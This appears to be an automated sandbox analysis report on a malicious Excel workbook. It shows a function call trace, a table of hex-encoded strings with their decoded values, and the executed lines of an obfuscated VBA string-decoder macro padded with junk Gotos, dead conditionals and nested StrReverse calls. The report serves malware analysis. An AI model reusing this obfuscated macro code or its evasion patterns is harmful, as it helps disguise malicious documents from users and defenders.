StrReverse	StrReverse("rFf{t{PKLQlv") -> vlQLKP{t{fFr StrReverse("2") -> 2
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse	StrReverse("mEU]MnwtpY") -> YptwnM]UEm
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Chr$
Val
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse	StrReverse("P.") -> .P StrReverse("8") -> 8
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$

Strings	Decrypted Strings
"32"	"2"
"33"	"3"
"34"	"4"
"35"	"5"
"456D5D556E4D74775970"	"Em]UnMtwYp"
"46727B667B744B50514C766C"	"Fr{f{tKPQLvl"
"4777727274517C6D7977"	"GwrrtQ\|myw"
"507A4A746D784C"	"PzJtmxL"
"7A744E7C6A7C674C6B4D"	"ztN\|j\|gLkM"
"JQySxVNozt"
"OSVMmB"
"QxQjdvsOk"
"lhvKghr"
"wBZfmQdt"
"33"	"3"
"456D5D556E4D74775970"	"Em]UnMtwYp"
"QxQjdvsOk"
"32"	"2"
"46727B667B744B50514C766C"	"Fr{f{tKPQLvl"
"QxQjdvsOk"
"34"	"4"
"4777727274517C6D7977"	"GwrrtQ\|myw"
"lhvKghr"
"34"	"4"
"7A744E7C6A7C674C6B4D"	"ztN\|j\|gLkM"
"34"	"4"
"4777727274517C6D7977"	"GwrrtQ\|myw"
"35"	"5"
"507A4A746D784C"	"PzJtmxL"
"JQySxVNozt"
"wBZfmQdt"
"34"	"4"
"7A744E7C6A7C674C6B4D"	"ztN\|j\|gLkM"
"32"	"2"
"46727B667B744B50514C766C"	"Fr{f{tKPQLvl"
"33"	"3"
"456D5D556E4D74775970"	"Em]UnMtwYp"
"35"	"5"
"507A4A746D784C"	"PzJtmxL"
"OSVMmB"
"OSVMmB"
"lhvKghr"
"JQySxVNozt"
"wBZfmQdt"
"39"	"9"
"54577D6D754A5E56825B76824A51"	"TW}muJ^V\x201a[v\x201aJQ"
"idRmdTsba"
"39"	"9"
"54577D6D754A5E56825B76824A51"	"TW}muJ^V\x201a[v\x201aJQ"
"32"	"2"
"46567454484F644F5B53"	"FVtTHOdO[S"
"33"	"3"
"6B6D527C4A59746C6E714B58"	"kmR\|JYtlnqKX"
"39"	"9"
"6E5F734F595681"	"n_sOYV\xfffd"
"31"	"1"
"5267434F7B476A63546D645B4F6F5A4B48"	"RgCO{GjcTmd[OoZKH"
"phGVygiDfkyId"
"phGVygiDfkyId"
"31"	"1"
"5267434F7B476A63546D645B4F6F5A4B48"	"RgCO{GjcTmd[OoZKH"
"33"	"3"
"6B6D527C4A59746C6E714B58"	"kmR\|JYtlnqKX"
"PHDPgQENlg"
"xQmfOwy"
"PHDPgQENlg"
"MPfABK"
"39"	"9"
"6E5F734F595681"	"n_sOYV\xfffd"
"idRmdTsba"
"xQmfOwy"
"32"	"2"
"46567454484F644F5B53"	"FVtTHOdO[S"
"MPfABK"

Line	Instruction	Meta Information
27	Public Function DZfiJRzM5(ByVal yvofgTHeW as String)
28	Dim DIzYhzYcE as Long, MSghprinR as String, ZxeIxq7Eb as String	executed
29	On Local Error Resume Next
30	For DIzYhzYcE = 1 To Len(yvofgTHeW) Step 2	Len("70") -> 2 executed
31	If 608372102 = 608372102 + 1 Then
31	End
31	Endif
32	Dim W8UH7XTHD as Double
33	If 383584756 = 383584756 + 1 Then
33	End
33	Endif
34	Dim HtUqpRQDHgHSMebwUs as Single
35	Goto pFwhQSmPUheNaAAbjv
35	pFwhQSmPUheNaAAbjv:
37	Goto uRBLRNZqFMOYvqTVCI
37	NsFEUZbSsHzkRToQV:
39	YSwyfzEMCiqrpuRZgJ = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("456D5D556E4D74775970"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse("mEU]MnwtpY") -> YptwnM]UEm executed
40	Goto gOcBBdmyauZx
40	QxssrwhahL:
42	Goto CxbdJPjrgLH
43	Goto YorumKoSCynH
43	qRbnOjNmEPEBv:
45	racwZerBQkYJlHGiPh = "QxQjdvsOk"
46	Goto KiRcieqGHdfoLtVmSZApUQQPUFyFkKw
46	xIapKxHfaDFlFLSoxywBZfmQedtwzrQf:
47	OLuHhhIQeFaEduU:
49	Goto IqsMpuHEnAaaBJQySxVnoztLuRBLRNZqFMOYvq
49	JgtHpGswVKH:
50	AcyKZGYJNncZSliFbz:
52	Goto TQnJiokvzNjkuDy
52	FtrlDAQGRYTfwxTeBiLbHOhpfKFGEJuov:
54	EbKVbYjABQYhFmPfLR = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("46727B667B744B50514C766C"))), StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("32"))))))))))	StrReverse executed
55	Goto AlBFIzZBhQMAVLCQbJJw
55	dfzchuFanbMoKJ:
57	racwZerBQkYJlHGiPh = "QxQjdvsOk"
58	Goto SkVaAbmgyvRo
58	tDJFRijEGPnUxNuAT:
60	KGSkyGHQojMOvBUdSy = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("4777727274517C6D7977"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))	StrReverse executed
61	Goto QxssrwhahL
61	sYsLGvbklj:
63	GFtgGdpElCptSGEyQNkG = "lhvKghr"
64	Goto ZRZDQPgkmeDSK
64	hEayqnyPeznw:
66	nMpTRzoIzqDNxwkkL = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7A744E7C6A7C674C6B4D"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))	StrReverse("tz\|N\|jLgMk") -> kMgLj\|N\|zt executed
67	Goto OsubvAIyennmqNUcGSS
67	IFcyQOKQoCYLU:
69	Goto MRaPvEEDIgmtYl
70	Goto nQSzTZhQCLLJOm
70	HIScQAPjDVQG:
72	KGSkyGHQojMOvBUdSy = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("4777727274517C6D7977"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))	StrReverse("wGrrQtm\|wy") -> yw\|mtQrrGw executed
73	Goto uvtykdkObaqu
73	SMTxZJaegYx:
75	GjnBxguTTuDPsLrO = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("507A4A746D784C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))	StrReverse("zPtJxmL") -> LmxJtPz executed
76	Goto EplZukbpzi
76	oAdwcAReRPJZvfqwsDUVr:
78	Goto ADGyQmfPxzTw
79	Goto CaGkzgmFNDjefd
79	VCIckZEAAzDpvCTutJz:
81	Goto GASBYHSZUgxMTV
82	Goto uSwbZGvPTKZjRQEE
82	rDRzQCGhURLebyTsyuGYtvEOJnCUpICsYhhg:
84	Goto jssryhahMYYnrumLaT
85	Goto VOVANMdgjbzOracwZerBQkYJlHGiP
85	EAMdsNBKidGIpIOQLr:
87	zrQfYIqsMpuHEnAaa = "JQySxVNozt"
88	Goto kZEAAzDpvC
88	CaGkzgmFNDjefd:
89	qiGVOyhjDgly:
91	Goto SMTxZJaegYx
91	VOVANMdgjbzOracwZerBQkYJlHGiP:
92	jssryhahMYYnrumLaT:
94	Goto SQxQjdvsOkI
94	YorumKoSCynH:
95	ADGyQmfPxzTw:
97	Goto pCMvvjUwSftbsei
97	UHiERgMfQUugaspLiGMITQ:
98	oonsdVdHUTk:
100	Goto HIScQAPjDVQG
100	utJzCuSwbZGvPFwKUDD:
102	BxIapKxHfaDFlFLSIox = "wBZfmQdt"
103	Goto qRbnOjNmEPEBv
103	wtnFDavTaVilzVQgq:
105	Goto OLuHhhIQeFaEduU
106	Goto OewQkeTzIJHMqxcpoEHKCcqjTBDAFSdyLzlMjiJrQIMmMYR
106	nQSzTZhQCLLJOm:
107	erfQsONpQoaeEepjB:
109	Goto NsFEUZbSsHzkRToQV
109	mwffRStCOrKpNgsgdQpm:
110	GASBYHSZUgxMTV:
112	Goto tDJFRijEGPnUxNuAT
112	mphFUNxfiCf:
113	CxbdJPjrgLH:
115	Goto xudqPPrzLoHndCdoiAkGqBGDOguCD
116	If 188710483 = 188710483 + 1 Then
116	End
116	Endif
117	Dim tVcjObaqtvoNcVFnpK as Single
118	Goto YrXyNnOZTlUqalrnQf
118	YrXyNnOZTlUqalrnQf:
119	uSwbZGvPTKZjRQEE:
120	MRaPvEEDIgmtYl:
122	Goto oAdwcAReRPJZvfqwsDUVr
122	eVuYCAiQrh:
124	Goto BNQfACLVQtJcwPJz
125	Goto mwffRStCOrKpNgsgdQpm
125	AlBFIzZBhQMAVLCQbJJw:
127	Goto AcyKZGYJNncZSliFbz
128	Goto JgtHpGswVKH
128	lgIKrxQZOupqotelsI:
130	Goto FKwCJbBAQGJBaDigN
131	Goto jzprjIlPNwkFmAKttggHPdEYDc
131	pPbUnVtdntpBRhoqzQ:
132	JLDdFkUPEZPGTfNM:
134	Goto vxekDLAgccbgQQfvVUl
134	OewQkeTzIJHMqxcpoEHKCcqjTBDAFSdyLzlMjiJrQIMmMYR:
135	BNQfACLVQtJcwPJz:
137	Goto hEayqnyPeznw
137	oNdVFnqKnrFPky:
138	VrPIEPhvQEOmhKL:
140	Goto YyUTwevhlKlw
140	xudqPPrzLoHndCdoiAkGqBGDOguCD:
142	If 768026680 = 768026680 + 1 Then
142	End
142	Endif
143	Dim fClKQMYoELNWtoSUBH as Double
144	Goto mnwVQtybiCKeaaYdPV
144	mnwVQtybiCKeaaYdPV:
146	nMpTRzoIzqDNxwkkL = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7A744E7C6A7C674C6B4D"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))	StrReverse executed
147	Goto lgIKrxQZOupqotelsI
147	vxekDLAgccbgQQfvVUl:
149	EbKVbYjABQYhFmPfLR = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("46727B667B744B50514C766C"))), StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("32"))))))))))	StrReverse("rFf{t{PKLQlv") -> vlQLKP{t{fFr executed
150	Goto eVuYCAiQrh
150	pCMvvjUwSftbsei:
152	YSwyfzEMCiqrpuRZgJ = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("456D5D556E4D74775970"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse("mEU]MnwtpY") -> YptwnM]UEm executed
153	Goto wtnFDavTaVilzVQgq
153	IqsMpuHEnAaaBJQySxVnoztLuRBLRNZqFMOYvq:
155	GjnBxguTTuDPsLrO = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("507A4A746D784C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))	StrReverse executed
156	Goto VCIckZEAAzDpvCTutJz
156	OsubvAIyennmqNUcGSS:
158	Goto oonsdVdHUTk
159	Goto mphFUNxfiCf
159	KiRcieqGHdfoLtVmSZApUQQPUFyFkKw:
161	vZoHcupeJSTRQHBImz = "OSVMmB"
162	Goto PSKjMrbQLgQMblTTGt
162	ZRZDQPgkmeDSK:
164	vZoHcupeJSTRQHBImz = "OSVMmB"
165	Goto dfzchuFanbMoKJ
165	EplZukbpzi:
167	Goto erfQsONpQoaeEepjB
168	Goto UHiERgMfQUugaspLiGMITQ
168	uvtykdkObaqu:
170	Goto qiGVOyhjDgly
171	Goto oNdVFnqKnrFPky
171	PSKjMrbQLgQMblTTGt:
173	GFtgGdpElCptSGEyQNkG = "lhvKghr"
174	Goto rDRzQCGhURLebyTsyuGYtvEOJnCUpICsYhhg
174	uRBLRNZqFMOYvqTVCI:
176	zrQfYIqsMpuHEnAaa = "JQySxVNozt"
177	Goto utJzCuSwbZGvPFwKUDD
177	jzprjIlPNwkFmAKttggHPdEYDc:
178	FKwCJbBAQGJBaDigN:
180	Goto FtrlDAQGRYTfwxTeBiLbHOhpfKFGEJuov
180	SkVaAbmgyvRo:
182	BxIapKxHfaDFlFLSIox = "wBZfmQdt"
183	Goto EAMdsNBKidGIpIOQLr
183	TQnJiokvzNjkuDy:
185	Goto sYsLGvbklj
185	gOcBBdmyauZx:
187	Goto VrPIEPhvQEOmhKL
188	Goto pPbUnVtdntpBRhoqzQ
188	YyUTwevhlKlw:
190	MSghprinR = MSghprinR & Chr$(Val(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("2E50"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38")))))))))))))))))) & Mid$(yvofgTHeW, DIzYhzYcE, 2)))	Chr$ Val StrReverse("P.") -> .P Mid$ executed
191	Goto IFcyQOKQoCYLU
191	SQxQjdvsOkI:
193	Goto JLDdFkUPEZPGTfNM
194	Goto xIapKxHfaDFlFLSoxywBZfmQedtwzrQf
194	kZEAAzDpvC:
196	Next DIzYhzYcE	Len("70") -> 2 executed
197	If 815340844 = 815340844 + 1 Then
197	End
197	Endif
198	Dim esnFah2BQ as Single
199	If 588073541 = 588073541 + 1 Then
199	End
199	Endif
200	Dim iMHCVdTMIIHMvpvbCn as Boolean
201	Goto VFQVSduyRSbAgKZGMf
201	VFQVSduyRSbAgKZGMf:
203	Goto wAOKtHhhHQdFZEcuTuF
203	QxPBFfFQKdawS:
204	NrGntMUKqlm:
206	Goto jfrHQsgpMHlnT
206	BrQfgejGNUzLLb:
208	euJfSczuYaGbgoeJRSQV = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("54577D6D754A5E56825B76824A51"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))	StrReverse executed
209	Goto iZyNGqYbvYc
209	knfDhLvrgAq:
211	wcQYVbLELqQCSQZQqS = "idRmdTsba"
212	Goto vFoobNpLYmT
212	ihxADvTjcLuwQtyLVrEeFcbCkBnrRrCw:
214	Goto CmxCzKcdyzI
215	Goto LjEdVRduIeRczuYZFa
215	RduIeRczuYZFafndIRRQ:
216	LwsgAriwGpo:
218	Goto szGlyxNQTLkzscKMhJOc
218	jfrHQsgpMHlnT:
220	DZfiJRzM5 = MSghprinR
221	Goto tBrQfgejGNUzL
221	CyKbcxzIgMqGntUJpllkoaSaEfQhknfD:
223	Goto LwsgAriwGpo
224	Goto LvrgAqhvFooNpLYmTlQbA
224	eIGodxofsDmlZZA:
226	euJfSczuYaGbgoeJRSQV = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("54577D6D754A5E56825B76824A51"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))	StrReverse executed
227	Goto UxQwTmymkewtPzKPMpqLMVubETAGaiYDyzxCn
227	VdwEtZUUSYJPQ:
229	xNOkmvSzdtagzHwc = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("46567454484F644F5B53"))), StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("32"))))))))))	StrReverse executed
230	Goto ONeTQOnQvtbPkQfpYYKKmuH
230	CAuMJgCbhdorGcdnwrkDYqlaFOPNSDxEivuKOR:
232	If 14014502 = 14014502 + 1 Then
232	End
232	Endif
233	Dim iuJqItwYMJDVSDZwEA as Currency
234	Goto ndJEFDIsltXjAEGwXA
234	ndJEFDIsltXjAEGwXA:
236	CLVQtJcwPJzfoonsdV = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6B6D527C4A59746C6E714B58"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
237	Goto ixpaHJfHLakESFsSp
237	VhbtdzjuzvHZnv:
